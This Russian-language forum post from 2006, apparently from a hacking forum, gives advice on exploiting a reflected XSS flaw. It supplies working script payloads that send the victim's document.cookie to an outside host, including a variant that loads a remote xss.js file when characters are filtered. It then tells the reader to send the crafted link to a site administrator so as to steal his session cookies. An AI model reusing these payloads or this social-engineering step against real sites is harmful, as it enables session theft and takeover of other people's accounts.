
23.02.2006, 20:51
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме: 5957900
Репутация:
561
|
|
Это пассивный XSS. Можешь вписать туда <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> если не фильтруются какие-либо спец символы. Если фильтруются можешь сделать так <script src=http://твой сайт/xss.js></script>Где в xss.js записано img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie; И дать эту ссылку админу. Если он лопух, получишь его куки.
|
|
|